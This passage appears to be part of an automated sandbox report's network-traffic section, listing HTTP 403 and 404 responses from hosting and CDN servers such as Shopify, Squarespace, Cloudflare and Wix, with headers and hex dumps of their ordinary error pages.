3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 27b53ed2-d45b-4f8c-b263-e594f62ea5e2CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bbrv7bQU2dMSrV9lSaISgbYn4iU8inGct9Jg6mQUtOJPAqiEqelPSHUDW1ZdSdL5qUbKT%2BUNEKTOti9c7dmgDWMhtHyBlt3zSTebFDZNFddsS5TB1Ya83UjjZbeokgw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.999950Server: cloudflareCF-RAY: 7ed76ec7fb473641-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=149Connection: Keep-AliveContent-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:10 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BZkmpa6UnCuaZWFmNGY2MWNlOTUyNGEwMDllNDEyMGQyYzUxZWNm;Path=/X-Contextid: C2ckg1mT/elt5KmRFData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:54:00 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 5fe664db-9438-43e0-bb58-1096524deb5aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5qY1xNPk5Q%2F6rwjPwQRPpi3o%2FTS0zHDEunoAkkttuVhYCHtiYFK3k12Gl1SwLsSrMi%2BsqNUwu7Hs37qR%2BjcBMkzR8UMrzSldONmEouv4PJiwTtUpYWxA%2FVGxkJs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=156.999826Server: cloudflareCF-RAY: 7ed76ecc0a8c9b7c-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:54:11 GMTX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Zen-Fury: 3a71c942c233b8d553c80c74daf5139c554e6df9Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 35 36 38 22 2c 20 31 36 39 30 34 38 37 36 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 36 3a 31 31 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6568", 1690487648, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487652.20099728924122550X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:54:12 GMTX-Served-By: cache-lin2290028-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4IqS8zPivBTUsdJc0mKredc,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:54:27 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wGP4vu%2B7Fsf%2BIw%2B4SnJ6JuOzE9C7mTbtwAAqwTE%2Bo4Oc2gFWlj%2BT%2F8%2F9oVQ8SOLuyRSmbzNaub9r7lfIPS5MSFR8wC%2BR4FIJzwK54mcYrhcdO3qkCZjA0vxdlYr1EV1H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76ed29e2e697f-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><met
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:12 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:12 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BbfwNzGNmb/eNTAzMTU3Yzg2YmUwZDJjZWI0ZmFlNDljMDRjMTJl;Path=/X-Contextid: VBoWbXuU/0fHqoGaKData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 